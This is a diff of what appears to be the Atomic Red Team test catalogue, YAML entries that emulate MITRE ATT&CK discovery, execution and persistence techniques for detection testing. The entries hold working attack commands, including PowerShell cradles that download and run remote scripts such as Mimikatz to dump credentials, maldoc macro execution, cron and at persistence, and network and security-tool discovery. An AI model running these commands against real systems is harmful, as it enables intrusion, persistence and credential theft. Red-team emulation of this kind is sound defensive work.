@@ -56127,7 +56127,7 @@ discovery: executor: command: 'for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i -' + ' name: command_prompt - name: Remote System Discovery - arp auto_generated_guid: 2d5a61f5-0447-4be4-944a-1f8530ed6574 @@ -56138,7 +56138,7 @@ discovery: executor: command: 'arp -a -' + ' name: command_prompt - name: Remote System Discovery - arp nix auto_generated_guid: acb6b1ff-e2ad-4d64-806c-6c35fe73b951 @@ -56153,17 +56153,17 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && apt-get install -y net-tools)\n" executor: command: 'arp -a | grep -v ''^?'' -' + ' name: sh - name: Remote System Discovery - sweep auto_generated_guid: 96db2632-8417-4dbb-b8bb-a8b92ba391de @@ -56191,7 +56191,7 @@ discovery: command: 'for ip in $(seq #{start_host} #{stop_host}); do ping -c 1 #{subnet}.$ip; [ $? -eq 0 ] && echo "#{subnet}.$ip UP" || : ; done -' + ' name: sh - name: Remote System Discovery - nslookup auto_generated_guid: baa01aaa-5e13-45ec-8a0d-e46c93c9760f 
@@ -56236,35 +56236,35 @@ discovery: dependencies: - description: 'Computer must have python 3 installed -' + ' prereq_command: 'if (python --version) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "Python 3 must be installed manually" -' + ' - description: 'Computer must have pip installed -' + ' prereq_command: 'if (pip3 -V) {exit 0} else {exit 1} -' + ' get_prereq_command: 'echo "PIP must be installed manually" -' + ' - description: 'adidnsdump must be installed and part of PATH -' + ' prereq_command: 'if (cmd /c adidnsdump -h) {exit 0} else {exit 1} -' + ' get_prereq_command: 'pip3 install adidnsdump -' + ' executor: command: 'adidnsdump -u #{user_name} -p #{acct_pass} --print-zones #{host_name} -' + ' name: command_prompt elevation_required: true - name: Adfind - Enumerate Active Directory Computer Objects @@ -56283,14 +56283,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=computer)\n" name: command_prompt @@ -56310,14 +56310,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -sc dclist\n" name: command_prompt 
@@ -56331,17 +56331,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'apt-get install iproute2 -y -' + ' executor: command: 'ip neighbour show -' + ' name: sh - name: Remote System Discovery - ip route auto_generated_guid: 1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1 @@ -56353,17 +56353,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'apt-get install iproute2 -y -' + ' executor: command: 'ip route show -' + ' name: sh - name: Remote System Discovery - ip tcp_metrics auto_generated_guid: 6c2da894-0b57-43cb-87af-46ea3b501388 @@ -56375,17 +56375,17 @@ discovery: dependencies: - description: 'Check if ip command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v ip)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'apt-get install iproute2 -y -' + ' executor: command: 'ip tcp_metrics show |grep --invert-match "^127\." -' + ' name: sh T1518.001: technique: @@ -56487,7 +56487,7 @@ discovery: executor: command: 'ps aux | egrep ''Little\ Snitch|CbOsxSensorService|falcond|nessusd|santad|CbDefense|td-agent|packetbeat|filebeat|auditbeat|osqueryd|BlockBlock|LuLu'' -' + ' name: sh - name: Security Software Discovery - ps (Linux) auto_generated_guid: 23b91cd2-c99c-4002-9e41-317c63e024a2 @@ -56499,7 +56499,7 @@ discovery: executor: command: 'ps aux | egrep ''falcond|nessusd|cbagentd|td-agent|packetbeat|filebeat|auditbeat|osqueryd'' -' + ' name: sh - name: Security Software Discovery - Sysmon Service auto_generated_guid: fe613cf3-8009-4446-9a0f-bc78a15b66c9 @@ -56512,7 +56512,7 @@ discovery: executor: command: 'fltmc.exe | findstr.exe 385201 -' + ' name: command_prompt elevation_required: true - name: Security Software Discovery - AV Discovery via WMI 
@@ -56589,7 +56589,7 @@ discovery: command: 'reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion -' + ' name: command_prompt - name: Applications Installed auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b @@ -56609,7 +56609,7 @@ discovery: software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors -' + ' supported_platforms: - macos executor: @@ -56718,7 +56718,7 @@ discovery: | grep -iE ''Oracle|VirtualBox|VMWare|Parallels'') then echo "Virtualization Environment detected"; fi; -' + ' - name: Detect Virtualization Environment (Windows) auto_generated_guid: 502a7dc4-9d6f-4d28-abf2-f0e84692562d description: 'Windows Management Instrumentation(WMI) objects contains system @@ -56728,7 +56728,7 @@ discovery: This is meant to find the result of Not supported, which is the result if run in a virtual machine -' + ' supported_platforms: - windows executor: @@ -56745,7 +56745,7 @@ discovery: the system. If it''s a virtual machine, one of the device manufacturer will be a Virtualization Software. -' + ' supported_platforms: - macos executor: @@ -56755,7 +56755,7 @@ discovery: ''Oracle|VirtualBox|VMWare|Parallels'') then echo ''Virtualization Environment detected''; fi; -' + ' - name: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) auto_generated_guid: 4a41089a-48e0-47aa-82cb-5b81a463bc78 description: "Windows Management Instrumentation(WMI) objects contain system @@ -56838,7 +56838,7 @@ discovery: description: 'Identify System Info. Upon execution, system info and time info will be displayed. -' + ' supported_platforms: - windows executor: @@ -56850,7 +56850,7 @@ discovery: auto_generated_guid: edff98ec-0f73-4f63-9890-6b117092aff6 description: 'Identify System Info -' + ' supported_platforms: - macos executor: 
@@ -56862,7 +56862,7 @@ discovery: auto_generated_guid: cccb070c-df86-4216-a5bc-9fb60c74e27c description: 'Identify System Info -' + ' supported_platforms: - linux - macos @@ -56879,14 +56879,14 @@ discovery: #{output_file} 2>/dev/null\n" cleanup_command: 'rm #{output_file} 2>/dev/null -' + ' name: sh - name: Linux VM Check via Hardware auto_generated_guid: 31dad7ad-2286-4c02-ae92-274418c85fec description: 'Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. -' + ' supported_platforms: - linux executor: @@ -56905,7 +56905,7 @@ discovery: description: 'Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. -' + ' supported_platforms: - linux executor: @@ -56921,40 +56921,40 @@ discovery: description: 'Identify system hostname for Windows. Upon execution, the hostname of the device will be displayed. -' + ' supported_platforms: - windows executor: command: 'hostname -' + ' name: command_prompt - name: Hostname Discovery auto_generated_guid: 486e88ea-4f56-470f-9b57-3f4d73f39133 description: 'Identify system hostname for Linux and macOS systems. -' + ' supported_platforms: - linux - macos executor: command: 'hostname -' + ' name: bash - name: Windows MachineGUID Discovery auto_generated_guid: 224b4daf-db44-404e-b6b2-f4d1f0126ef8 description: 'Identify the Windows MachineGUID value for a system. Upon execution, the machine GUID will be displayed from registry. -' + ' supported_platforms: - windows executor: command: 'REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid -' + ' name: command_prompt - name: Griffon Recon auto_generated_guid: 69bd4abe-8759-49a6-8d21-0f15822d6370 
@@ -56979,27 +56979,27 @@ discovery: description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. -' + ' supported_platforms: - windows executor: command: 'set -' + ' name: command_prompt - name: Environment variables discovery on macos and linux auto_generated_guid: fcbdd43f-f4ad-42d5-98f3-0218097e2720 description: 'Identify all environment variables. Upon execution, environments variables and your path info will be displayed. -' + ' supported_platforms: - macos - linux executor: command: 'env -' + ' name: sh T1614: technique: @@ -57146,7 +57146,7 @@ discovery: executor: command: 'netsh advfirewall firewall show rule name=all -' + ' name: command_prompt - name: System Network Configuration Discovery auto_generated_guid: c141bbdb-7fca-4254-9fd6-f47e79447e17 @@ -57161,11 +57161,11 @@ discovery: dependencies: - description: 'Check if arp command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v arp)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: "(which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)\n" executor: @@ -57217,10 +57217,10 @@ discovery: dependencies: - description: 'Test requires #{port_file} to exist -' + ' prereq_command: 'if (Test-Path "#{port_file}") {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null Invoke-WebRequest "#{portfile_url}" -OutFile "#{port_file}" @@ -57239,7 +57239,7 @@ discovery: | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n" cleanup_command: 'Remove-Item -ErrorAction ignore "#{output_file}" -' + ' name: powershell - name: Adfind - Enumerate Active Directory Subnet Objects auto_generated_guid: 9bb45dd7-c466-4f93-83a1-be30e56033ee 
@@ -57257,14 +57257,14 @@ discovery: dependencies: - description: 'AdFind.exe must exist on disk at specified location (#{adfind_path}) -' + ' prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path} -' + ' executor: command: "#{adfind_path} -f (objectcategory=subnet)\n" name: command_prompt @@ -57393,7 +57393,7 @@ discovery: executor: command: 'Get-NetTCPConnection -' + ' name: powershell - name: System Network Connections Discovery Linux & MacOS auto_generated_guid: 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2 @@ -57408,14 +57408,14 @@ discovery: dependencies: - description: 'Check if netstat command exists on the machine -' + ' prereq_command: 'if [ -x "$(command -v netstat)" ]; then exit 0; else exit 1; fi; -' + ' get_prereq_command: 'echo "Install netstat on the machine."; exit 1; -' + ' executor: command: | netstat @@ -57449,10 +57449,10 @@ discovery: dependencies: - description: 'Sharpview.exe must exist on disk at specified location (#{SharpView}) -' + ' prereq_command: 'if (Test-Path #{SharpView}) {exit 0} else {exit 1} -' + ' get_prereq_command: | New-Item -Type Directory (split-path #{SharpView}) -ErrorAction ignore | Out-Null Invoke-WebRequest #{SharpView_url} -OutFile "#{SharpView}" @@ -57631,10 +57631,10 @@ discovery: executor: command: 'net.exe start >> #{output_file} -' + ' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 -' + ' name: command_prompt T1124: technique: @@ -57701,7 +57701,7 @@ discovery: description: 'Identify the system time. Upon execution, the local computer system time and timezone will be displayed. -' + ' supported_platforms: - windows input_arguments: 
@@ -57719,13 +57719,13 @@ discovery: description: 'Identify the system time via PowerShell. Upon execution, the system time will be displayed. -' + ' supported_platforms: - windows executor: command: 'Get-Date -' + ' name: powershell - name: System Time Discovery in macOS auto_generated_guid: f449c933-0891-407f-821e-7916a21a1a6f @@ -57736,7 +57736,7 @@ discovery: executor: command: 'date -' + ' name: sh T1497.003: technique: @@ -59368,11 +59368,11 @@ resource-development: dependencies: - description: 'Advancedrun.exe must be located at #{local_folder}\#{local_executable} -' + ' prereq_command: 'if(Test-Path -Path #{local_folder}\#{local_executable}) {exit 0} else {exit 1} -' + ' get_prereq_command: | Invoke-WebRequest "http://www.nirsoft.net/utils/advancedrun.zip" -UseBasicParsing -OutFile "$env:temp\AdvancedRun.zip" Expand-Archive $env:temp\AdvancedRun.zip #{local_folder} -Force @@ -59383,7 +59383,7 @@ resource-development: cleanup_command: 'Remove-Item #{local_folder}\#{local_executable} -ErrorAction Ignore -' + ' name: powershell elevation_required: true T1608.001: @@ -61370,7 +61370,7 @@ execution: command: 'osascript -e "do shell script \"echo \\\"import sys,base64,warnings;warnings.filterwarnings(''ignore'');exec(base64.b64decode(''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''));\\\" | python &\"" -' + ' name: sh T1053.001: technique: @@ -61427,7 +61427,7 @@ execution: description: 'This test submits a command to be run in the future by the `at` daemon. -' + ' supported_platforms: - linux input_arguments: 
@@ -61443,30 +61443,30 @@ execution: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH -' + ' prereq_command: 'which at && which atd -' + ' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' -' + ' - description: 'The `atd` daemon must be running -' + ' prereq_command: 'systemctl status atd || service atd status -' + ' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' -' + ' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} -' + ' T1053.002: technique: external_references: @@ -61563,7 +61563,7 @@ execution: elevation_required: false command: 'at 13:20 /interactive cmd -' + ' T1059: technique: created: '2017-05-31T21:30:49.546Z' @@ -61860,7 +61860,7 @@ execution: a backdoor container, and run their malicious code remotely by using “kubectl exec”. -' + ' supported_platforms: - containers input_arguments: @@ -61875,20 +61875,20 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: | kubectl create -f src/busybox.yaml -n #{namespace} kubectl exec -n #{namespace} busybox -- #{command} cleanup_command: 'kubectl delete pod busybox -n #{namespace} -' + ' name: bash elevation_required: false T1053.007: @@ -61957,7 +61957,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -61968,17 +61968,17 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl get cronjobs -n #{namespace} -' + ' name: bash elevation_required: false - name: CreateCronjob 
@@ -61990,7 +61990,7 @@ execution: CronJob for scheduling execution of malicious code that would run as a container in the cluster. -' + ' supported_platforms: - containers input_arguments: @@ -62001,20 +62001,20 @@ execution: dependencies: - description: 'kubectl must be installed -' + ' get_prereq_command: 'echo "kubectl must be installed manually" -' + ' prereq_command: 'which kubectl -' + ' executor: command: 'kubectl create -f src/cronjob.yaml -n #{namespace} -' + ' cleanup_command: 'kubectl delete cronjob art -n #{namespace} -' + ' name: bash elevation_required: false T1053.003: @@ -62073,7 +62073,7 @@ execution: of the referenced file. This technique was used by numerous IoT automated exploitation attacks. -' + ' supported_platforms: - macos - linux @@ -62093,7 +62093,7 @@ execution: echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron} cleanup_command: 'crontab /tmp/notevil -' + ' - name: Cron - Add script to all cron subfolders auto_generated_guid: b7d42afa-9086-4c8a-b7b0-8ea3faa6ebb0 description: 'This test adds a script to /etc/cron.hourly, /etc/cron.daily, @@ -62101,7 +62101,7 @@ execution: schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - macos - linux @@ -62133,7 +62133,7 @@ execution: to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers. -' + ' supported_platforms: - linux input_arguments: @@ -62150,10 +62150,10 @@ execution: name: bash command: 'echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name} -' + ' cleanup_command: 'rm /var/spool/cron/crontabs/#{cron_script_name} -' + ' T1610: technique: external_references: @@ -62300,7 +62300,7 @@ execution: auto_generated_guid: f592ba2a-e9e8-4d62-a459-ef63abd819fd description: 'Executes commands via DDE using Microsfot Word -' + ' supported_platforms: - windows executor: 
@@ -62323,13 +62323,13 @@ execution: ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script -' + ' supported_platforms: - windows executor: command: 'start $PathToAtomicsFolder\T1559.002\bin\DDE_Document.docx -' + ' name: command_prompt - name: DDEAUTO auto_generated_guid: cf91174c-4e74-414e-bec0-8d60a104d181 @@ -62643,7 +62643,7 @@ execution: auto_generated_guid: 6fb61988-724e-4755-a595-07743749d4e2 description: 'Utilize launchctl -' + ' supported_platforms: - macos input_arguments: @@ -62658,10 +62658,10 @@ execution: executor: command: 'launchctl submit -l #{label_name} -- #{executable_path} -' + ' cleanup_command: 'launchctl remove #{label_name} -' + ' name: bash T1053.004: technique: @@ -62802,7 +62802,7 @@ execution: jse_path: description: 'Path for the macro to write out the "malicious" .jse file -' + ' type: String default: C:\Users\Public\art.jse ms_product: @@ -62813,7 +62813,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62824,7 +62824,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62833,13 +62833,13 @@ execution: Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore -' + ' name: powershell - name: OSTap Payload Download auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80 description: 'Uses cscript //E:jscript to download a file -' + ' supported_platforms: - windows input_arguments: 
@@ -62857,7 +62857,7 @@ execution: cscript //E:Jscript #{script_file} cleanup_command: 'del #{script_file} /F /Q >nul 2>&1 -' + ' name: command_prompt - name: Maldoc choice flags command execution auto_generated_guid: 0330a5d2-a45a-4272-a9ee-e364411c4b18 @@ -62875,7 +62875,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62886,7 +62886,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62914,7 +62914,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62925,7 +62925,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62952,7 +62952,7 @@ execution: dependencies: - description: 'Microsoft #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -62963,7 +62963,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -62995,7 +62995,7 @@ execution: dependencies: - description: 'Microsoft Excel must be installed -' + ' prereq_command: | try { New-Object -COMObject "Excel.Application" | Out-Null 
@@ -63005,7 +63005,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Excel manually to meet this requirement" -' + ' executor: command: | $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs" @@ -63077,7 +63077,7 @@ execution: dependencies: - description: 'Microsoft Word must be installed -' + ' prereq_command: | try { $wdApp = New-Object -COMObject "Word.Application" @@ -63086,10 +63086,10 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft Word manually to meet this requirement" -' + ' - description: 'Google Chrome must be installed -' + ' prereq_command: | try { $chromeInstalled = (Get-Item (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe').'(Default)').VersionInfo.FileName @@ -63098,7 +63098,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Google Chrome manually to meet this requirement" -' + ' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 @@ -63107,7 +63107,7 @@ execution: name: powershell cleanup_command: 'Stop-Process -name mshta -' + ' - name: Potentially Unwanted Applications (PUA) auto_generated_guid: 02f35d62-9fdc-4a97-b899-a5d9a876d295 description: 'The Potentially Unwanted Applications (PUA) protection feature @@ -63119,7 +63119,7 @@ execution: instead of a VIRUS (i.e. not actually malicious, but is flagged as it to verify anti-pua protection). -' + ' supported_platforms: - windows input_arguments: 
@@ -63154,16 +63154,16 @@ execution: macro_path: description: 'Location of file which will be converted to a VBA macro -' + ' type: Path default: PathToAtomicsFolder/T1204.002/src/test9-GenericPayloadDownload.txt c2_domain: description: 'This required variable points to a user defined HTTP server that will host the file_name in the c2_parent_directory. -' + ' type: Url - default: + default: c2_parent_directory: description: | Parent directory where you have the "malicious" file on c2_domain server. @@ -63180,7 +63180,7 @@ execution: ms_product: description: 'Maldoc application Word or Excel -' + ' type: String default: Word dependency_executor_name: powershell @@ -63188,17 +63188,17 @@ execution: - description: 'Destination c2_domain name or IP address must be set to a running HTTP server. -' + ' prereq_command: 'if (#{c2_domain}) (exit 0) else (exit 1) -' + ' get_prereq_command: 'Write-Host "Destination c2 server domain name or IP address must be set and reachable for HTTP service" -' + ' - description: 'Microsoftt #{ms_product} must be installed -' + ' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -63209,7 +63209,7 @@ execution: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" -' + ' executor: name: powershell command: | @@ -63222,7 +63222,7 @@ execution: cleanup_command: 'Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore -' + ' T1204.003: technique: external_references: @@ -63564,7 +63564,7 @@ execution: description: 'Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -63576,7 +63576,7 @@ execution: command: 'powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''#{mimurl}''); Invoke-Mimikatz -DumpCreds" -' + ' name: command_prompt elevation_required: true - name: Run BloodHound from local disk 
@@ -63596,15 +63596,15 @@ execution: dependencies: - description: 'SharpHound.ps1 must be located at #{file_path} -' + ' prereq_command: 'if (Test-Path #{file_path}\SharpHound.ps1) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Invoke-WebRequest "https://raw.githubusercontent.com/BloodHoundAD/BloodHound/804503962b6dc554ad7d324cfa7f2b4a566a14e2/Ingestors/SharpHound.ps1" -OutFile "#{file_path}\SharpHound.ps1" -' + ' executor: command: | write-host "Import and Execution of SharpHound.ps1 from #{file_path}" -ForegroundColor Cyan @@ -63613,7 +63613,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force -' + ' name: powershell - name: Run Bloodhound from Memory using Download Cradle auto_generated_guid: bf8c1441-4674-4dab-8e4e-39d93d08f9b7 @@ -63631,7 +63631,7 @@ execution: Start-Sleep 5 cleanup_command: 'Remove-Item $env:Temp\*BloodHound.zip -Force -' + ' name: powershell - name: Obfuscation Tests auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 @@ -63639,7 +63639,7 @@ execution: out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" -' + ' supported_platforms: - windows executor: @@ -63654,7 +63654,7 @@ execution: will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. -' + ' supported_platforms: - windows executor: @@ -63685,7 +63685,7 @@ execution: command: 'Powershell.exe "IEX (New-Object Net.WebClient).DownloadString(''https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1''); Invoke-AppPathBypass -Payload ''C:\Windows\System32\cmd.exe''" -' + ' name: command_prompt - name: Powershell MsXml COM object - with prompt auto_generated_guid: 388a7340-dbc1-4c9d-8e59-b75ad8c6d5da 
@@ -63705,7 +63705,7 @@ execution: MsXml2.ServerXmlHttp;$comMsXml.Open(''GET'',''#{url}'',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" -' + ' name: command_prompt - name: Powershell XML requests auto_generated_guid: 4396927f-e503-427b-b023-31049b9b09a6 @@ -63725,7 +63725,7 @@ execution: bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load(''#{url}'');$Xml.command.a.execute | IEX" -' + ' name: command_prompt - name: Powershell invoke mshta.exe download auto_generated_guid: 8a2ad40b-12c7-4b25-8521-2737b0a415af @@ -63743,7 +63743,7 @@ execution: executor: command: 'C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject(''script:#{url}'').Exec();close()" -' + ' name: command_prompt - name: Powershell Invoke-DownloadCradle auto_generated_guid: cc50fa2a-a4be-42af-a88f-e347ba0bf4d7 @@ -63785,26 +63785,26 @@ execution: dependencies: - description: 'PowerShell version 2 must be installed -' + ' prereq_command: 'if(2 -in $PSVersionTable.PSCompatibleVersions.Major) {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Automated installer not implemented yet, please install PowerShell v2 manually -' + ' executor: command: 'powershell.exe -version 2 -Command Write-Host $PSVersion -' + ' name: powershell - name: NTFS Alternate Data Stream Access auto_generated_guid: 8e5c5532-1181-4c1d-bb79-b3a9f5dbd680 description: 'Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. -' + ' supported_platforms: - windows input_arguments: @@ -63815,14 +63815,14 @@ execution: dependencies: - description: 'Homedrive must be an NTFS drive -' + ' prereq_command: 'if((Get-Volume -DriveLetter $env:HOMEDRIVE[0]).FileSystem -contains "NTFS") {exit 0} else {exit 1} -' + ' get_prereq_command: 'Write-Host Prereq''s for this test cannot be met automatically -' + ' executor: name: powershell command: | 
@@ -63831,7 +63831,7 @@ execution: Invoke-Expression $streamcommand cleanup_command: 'Remove-Item #{ads_file} -Force -ErrorAction Ignore -' + ' - name: PowerShell Session Creation and Use auto_generated_guid: 7c1acec2-78fa-4305-a3e0-db2a54cddecd description: | @@ -63848,12 +63848,12 @@ execution: dependencies: - description: 'PSRemoting must be enabled -' + ' prereq_command: "Try {\n New-PSSession -ComputerName #{hostname_to_connect} -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n" get_prereq_command: 'Enable-PSRemoting -' + ' executor: name: powershell elevation_required: true @@ -63887,7 +63887,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -Execute -ErrorAction @@ -63923,7 +63923,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -CommandParamVariation #{command_param_variation} -UseEncodedArguments -EncodedArgumentsParamVariation @@ -63954,7 +63954,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -Execute @@ -63990,7 +63990,7 @@ execution: get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force -' + ' executor: command: 'Out-ATHPowerShellCommandLineParameter -CommandLineSwitchType #{command_line_switch_type} -EncodedCommandParamVariation #{encoded_command_param_variation} -UseEncodedArguments 
@@ -64003,7 +64003,7 @@ execution: outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. -' + ' supported_platforms: - windows input_arguments: @@ -64014,7 +64014,7 @@ execution: executor: command: 'powershell.exe -e #{obfuscated_code} -' + ' name: command_prompt - name: PowerShell Invoke Known Malicious Cmdlets auto_generated_guid: 49eb9404-5e0f-4031-a179-b40f7be385e3 @@ -64036,7 +64036,7 @@ execution: "PowerUp", "PowerView", "Remove-Comments", "Remove-VolumeShadowCopy", "Set-CriticalProcess", "Set-MasterBootRecord" -' + ' executor: name: powershell elevation_required: true @@ -64050,7 +64050,7 @@ execution: auto_generated_guid: 1289f78d-22d2-4590-ac76-166737e1811b description: 'Check for privilege escalation paths using PowerUp from PowerShellMafia -' + ' supported_platforms: - windows executor: @@ -64135,7 +64135,7 @@ execution: $which_python -c 'import requests' 2>/dev/null; echo $? get_prereq_command: 'pip install requests -' + ' executor: command: | which_python=$(which python || which python3 || which python2) @@ -64175,7 +64175,7 @@ execution: dependencies: - description: 'Requires Python -' + ' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64202,7 +64202,7 @@ execution: an external malicious script then executes locally using the supplied executor and arguments -' + ' supported_platforms: - linux input_arguments: @@ -64236,7 +64236,7 @@ execution: dependencies: - description: 'Requires Python -' + ' prereq_command: | which_python=$(which python || which python3 || which python2); $which_python -V $which_python -c 'import requests' 2>/dev/null; echo $? @@ -64259,7 +64259,7 @@ execution: name: sh cleanup_command: 'rm #{python_binary_name} #{python_script_name} #{payload_file_name} -' + ' T1053.005: technique: created: '2019-11-27T14:58:00.429Z' 
